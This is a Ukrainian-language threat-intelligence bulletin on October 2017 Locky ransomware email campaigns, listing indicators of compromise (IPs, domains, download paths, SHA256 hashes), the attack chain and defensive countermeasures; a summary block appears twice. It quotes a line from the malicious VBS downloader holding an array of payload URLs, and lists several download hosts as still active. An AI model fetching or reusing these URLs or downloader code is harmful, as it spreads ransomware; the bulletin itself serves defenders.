SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
178.136.206.128    mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29         georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

не активні

69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_041017

Доброго дня, панове.

На протязі останніх днів було зафіксовано масові спроби доставки Locky Ransomware (розглядав тут і тут ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS та необфусковані VBS скрипти у оболонці 7z та Zip.

Схема атаки:

email > Attach (7z/Zip) > JS / VBS > 2-3 URL > GET > %temp%\random.exe

Маркери IOC:

f17e6d1e-3827-47da-b191-55e94e24c406

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (-)
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (+)

завантаження >

Filename UuhgwJfbwT3.exe
Size 576KiB (589824 bytes)
SHA256 b38ba4b2328342e46bdb396710161535870a1421819eae171f99a114a3d958a0

I_197975

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)
185.119.213.186 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

I_980998

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

New Doc 2017-10-02 – Page 3 -8402

86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)

New Doc 2017-10-02 – Page 3 -8692

66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw HTTP/1.1 (-)
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw HTTP/1.1 (+)

завантаження >

Filename wLoxrGw4.exe
Size 595KiB (608768 bytes)
SHA256 70d06bd4e6a91b60bc8515e327fa1f9fb7ac82125e3c8a06359b5bb3f96e48f3

свіжий, необфускований VBS, перевірки коду країни нема

Invoice505122638848637420994974

Plyask = Array("tecnigrafite.com/8etyfh3ni?","derainlay.info/p66/8etyfh3ni","securmailbox.it/8etyfh3ni?")
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

усі три поки активні

завантаження >

Filename zzXOPtNyW.exe
Size 606KiB (620544 bytes)
SHA256 5ccb49b3a3bb1cf0cbeaebf50ed30344e4b87f19ca2d6dad578d5210de904d65

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні!

js
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI
184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw
vbs
89.96.90.14 80 HTTP 366 tecnigrafite.com GET /8etyfh3ni? HTTP/1.1
77.123.218.185 80 HTTP 367 derainlay.info GET /p66/8etyfh3ni HTTP/1.1
89.96.90.14 80 HTTP 365 securmailbox.it GET /8etyfh3ni? HTTP/1.1

вже не активні

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI
98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz
86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa
66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR